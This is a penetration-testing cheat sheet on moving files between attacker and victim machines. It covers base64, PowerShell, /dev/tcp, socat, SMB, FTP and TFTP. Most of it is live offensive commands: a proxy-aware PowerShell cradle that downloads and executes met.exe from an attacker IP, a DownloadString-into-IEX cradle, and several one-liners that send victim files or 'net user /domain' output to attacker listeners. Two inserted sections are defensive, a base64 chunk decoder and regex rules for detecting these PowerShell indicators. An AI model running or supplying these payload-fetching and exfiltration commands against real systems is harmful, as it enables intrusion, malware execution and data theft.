# File Transfer

* <https://blog.ropnop.com/transferring-files-from-kali-to-windows/>
* <https://github.com/evilmog/evilmog/wiki/DNS-Download-Cradle>

## Base64

String to base64 and POST with PowerShell:

```
PS > $str = cmd /c net user /domain
PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS > IWR -Uri http://127.0.0.1/msg -Method POST -Body $base64str
```

File to base64 with `certutil`:

```
Cmd > certutil -encode <FILE_TO_ENCODE> C:\Windows\Temp\encoded.b64
Cmd > type C:\Windows\Temp\encoded.b64
```

Base64 file transfer from Linux to Windows:

```
$ base64 -w0 tunnel.aspx; echo
...BASE64_CONTENTS...
PS > Add-Content -Encoding UTF8 tunnel.b64 "<BASE64_CONTENTS>" -NoNewLine
PS > $data = Get-Content -Raw tunnel.b64
PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data))
```

Print file by base64 chunks in console:

```
$ python -c "import base64;f=open('data.bin','rb');[print(base64.b64encode(c).decode()) for c in iter(lambda: f.read(4096), b'')]"
```
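Added example (not from the original page): the one-liner encodes each 4096-byte chunk on its own, and 4096 is not a multiple of 3, so every line ends in `=` padding and the printed lines cannot be joined into a single Base64 stream. The sketch below reassembles such output line by line; `SAMPLE` is constructed data and all function names are assumptions of this example.

```python
import base64

CHUNK = 4096  # chunk size used by the one-liner above
SAMPLE = bytes(range(256)) * 40  # constructed 10240-byte stand-in for data.bin


def encode_chunks(data, size=CHUNK):
    """Mirror the one-liner: one independently encoded Base64 line per chunk."""
    return [base64.b64encode(data[i:i + size]).decode()
            for i in range(0, len(data), size)]


def has_interior_padding(lines):
    """True if a line other than the last ends in '=': the lines are separate
    Base64 documents and must not be joined before decoding."""
    body = [ln.strip() for ln in lines if ln.strip()]
    return any(ln.endswith("=") for ln in body[:-1])


def decode_chunks(lines):
    """Decode each line on its own, rejecting anything that is not strict Base64."""
    out = bytearray()
    for number, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue  # tolerate blank lines from a copied console buffer
        try:
            out += base64.b64decode(line, validate=True)
        except ValueError as exc:  # binascii.Error subclasses ValueError
            raise ValueError(f"line {number}: {exc}") from None
    return bytes(out)


if __name__ == "__main__":
    lines = encode_chunks(SAMPLE)
    print(len(lines), "lines, interior padding:", has_interior_padding(lines))
    print("round trip ok:", decode_chunks(lines) == SAMPLE)
```

With a chunk size that is a multiple of 3 (for example 4095), only the final line can carry padding and the lines also decode correctly when concatenated.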

## Hex

Compress a binary file and transfer it to Windows by copy-pasting commands into the console:

```
$ upx -9 file.exe
$ exe2hex -x file.exe -p file.cmd
$ cat file.cmd | xclip -i -sel c
```

## PowerShell

PowerShell upload file:

```
PS > (New-Object Net.WebClient).UploadFile("http://10.10.13.37/file.txt", "file.txt")
```

PowerShell auto detect proxy, download file from remote HTTP server and run it:

```powershell
$proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("http://10.10.13.37/met.exe","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe")
```

PowerShell manually set proxy and upload file to remote HTTP server:

```powershell
$client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("http://10.10.13.37/results.txt","results.txt")
```

Another proxy-aware download cradle:

```powershell
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem "HKU:\" -ErrorAction SilentlyContinue
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start=$key.Name.Substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxyAddr")
$wc = New-Object System.Net.WebClient
$wc.DownloadString("http://10.10.13.37/test.txt") | IEX
Remove-PSDrive -Name HKU -Force
```

Quick connection tests for HTTP/HTTPS:

```
# HTTP
PS > IWR -UseBasicParsing -Uri http://www.msftconnecttest.com/connecttest.txt -UserAgent "Microsoft NCSI"
# HTTPS
PS > [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS > [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
PS > [System.Net.ServicePointManager]::Expect100Continue = $false
PS > (IWR -UseBasicParsing -Uri https://www.microsoft.com/en-us/microsoft-365 -UserAgent "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko").RawContentLength
```

Through a negotiate proxy with creds (can also use [proxy-negotiate](https://github.com/COUR4G3/proxy-negotiate)):

```
$ KRB5CCNAME=user.ccache curl -v -sSL -k -A 'Microsoft NCSI' --proxy http://gate01.megacorp.local:8080 [--proxy-user 'megacorp.local\user:Passw0rd!'] [--proxy-ntlm] --proxy-negotiate http://www.msftncsi.com/ncsi.txt
```
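Added example (not from the original page): the PowerShell commands in this section leave recognisable strings in script block logs (Event ID 4104), so a defender can match on them. The rule names, severities and sample script blocks below are constructed for this sketch and are not an established rule set.

```python
import re

# Indicators taken from the commands in this section; names and severities
# are choices made for this example.
RULES = [
    ("tls-validation-disabled", "high",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("download-and-invoke", "high",
     re.compile(r"\.DownloadString\(.+?\)\s*\|\s*(IEX|Invoke-Expression)\b", re.I)),
    ("webclient-file-transfer", "medium",
     re.compile(r"Net\.WebClient\b.*\.(UploadFile|DownloadFile)\(", re.I)),
    ("proxy-read-from-registry", "medium",
     re.compile(r"""Internet Settings\\?['"]?\)?\.ProxyServer""", re.I)),
    ("ncsi-user-agent", "low",
     re.compile(r"""-UserAgent\s+['"]Microsoft NCSI['"]""", re.I)),
]

# Constructed script block texts (192.0.2.10 is a documentation address).
SAMPLES = [
    r'Get-ChildItem C:\Users -Recurse | Measure-Object',
    r'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}',
    r'$wc = New-Object System.Net.WebClient; '
    r'$wc.DownloadString("http://192.0.2.10/test.txt") | IEX',
    r'(New-Object Net.WebClient).UploadFile("http://192.0.2.10/file.txt", "file.txt")',
    r'$p=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion'
    r'\Internet Settings").ProxyServer; IWR -Uri http://192.0.2.10/ -UserAgent "Microsoft NCSI"',
]


def scan(script_blocks):
    """Return {index: [(rule, severity), ...]} for blocks that hit any rule."""
    hits = {}
    for index, text in enumerate(script_blocks):
        matched = [(name, sev) for name, sev, rx in RULES if rx.search(text)]
        if matched:
            hits[index] = matched
    return hits


if __name__ == "__main__":
    for index, matched in scan(SAMPLES).items():
        print(index, matched)
```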

## /dev/tcp

Attacker is the sender:

```
# Sender:
root@kali:~$ tar -zcvf folder.tar.gz folder
root@kali:~$ nc -w3 -lvnp 1234 < folder.tar.gz
# Recipient:
www-data@victim:~$ bash -c 'cat < /dev/tcp/127.0.0.1/1234 > .folder.tar.gz'
www-data@victim:~$ tar -zxvf .folder.tar.gz
```

Victim is the sender:

```
# Recipient:
root@kali:~$ nc -w3 -lvnp 1234 > file.txt
# Sender:
www-data@victim:~$ bash -c 'cat < file.txt > /dev/tcp/127.0.0.1/1234'
```

## socat

Recipient (Attacker):

```
$ socat TCP-LISTEN:1337 OPEN:data.tar,create,append
```

Sender (Victim):

```
$ tar cf - /dev/shm/data | socat TCP:10.10.13.37:1337 -
```

## SSH

SSH + cat/type:

```
$ ssh root@192.168.1.11 'type "C:\Windows\Temp\data.bin"' | pv > /tmp/data.bin
```

## SMB

### smbserver.py

Start SMB server:

```
$ smbserver.py -smb2support share `pwd`
```

Mount SMB in Windows with `net use`:

```
$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
Cmd > net use Z: \\10.10.13.37\share
Cmd > net use Z: \\10.10.13.37\share /u:snovvcrash Passw0rd!
```

Mount SMB in Windows with `New-PSDrive`:

```
$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass)
# Or
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))
PS > New-PSDrive -Name Z -Root \\10.10.13.37\share -Credential $cred -PSProvider FileSystem
PS > cd Z:
```

### net share

```
Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL"
# Or
Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL"
Cmd > net share pentest /delete
```

## FTP

```
$ python -m pip install pyftpdlib
$ python -m pyftpdlib -Dwp 2121
Cmd > cd C:\Windows\System32\spool\drivers\color
Cmd > echo open 127.0.0.1 2121 > ftp.txt
Cmd > echo user anonymous >> ftp.txt
Cmd > echo anonymous >> ftp.txt
Cmd > echo binary >> ftp.txt
Cmd > echo put file.bin >> ftp.txt
Cmd > echo bye >> ftp.txt
Cmd > ftp -v -n -s:ftp.txt
```

## TFTP

Send `file.exe` from Windows to Linux (TFTP client must be [enabled](https://teckangaroo.com/enable-tftp-windows-10/) on Windows):

```
$ sudo atftpd --daemon --bind 10.10.13.37 --port 69 ./tftp
Cmd > tftp -i 10.10.13.37 put file.exe
$ sudo pkill atftpd
```

## ICMP

* <https://github.com/icyguider/ICMP-TransferTools>
* [https://snovvcrash.github.io/2019/04/05/htb-mischief.html](https://snovvcrash.github.io/2019/04/05/htb-mischief.html#icmpshellpy)

## Exfiltration / Infiltration

* <https://xakep.ru/2022/09/22/infilltration-and-exfiltration/>
* <https://github.com/s0i37/exfiltrate>

## Tools

### http-server

* <https://github.com/http-party/http-server>

```
$ sudo apt install npm -y
$ sudo npm install http-server -g
$ sudo http-server -d false -p 443 -S -C /etc/letsencrypt/live/example.com/cert.pem -K /etc/letsencrypt/live/example.com/privkey.pem --log-ip | tee http-server.log
```

### goshs

* <https://github.com/patrickhener/goshs>

```
$ eget -qs linux/amd64 "patrickhener/goshs" --to ~/tools/goshs
$ sudo ~/tools/goshs/goshs -ro -si -p 443 -s -sc /etc/letsencrypt/live/example.com/cert.pem -sk /etc/letsencrypt/live/example.com/privkey.pem -V | tee goshs.log
```

### simplehttpserver

* <https://github.com/projectdiscovery/simplehttpserver>

```
$ eget -qs linux/amd64 "projectdiscovery/simplehttpserver" --to ~/tools/pd
$ sudo ~/tools/pd/simplehttpserver -listen 10.10.13.37:1337 -path `pwd` -upload -https -cert /etc/letsencrypt/live/example.com/fullchain.pem -key /etc/letsencrypt/live/example.com/privkey.pem -domain example.com -basic-auth 'snovvcrash:Passw0rd!' -max-file-size 100
```

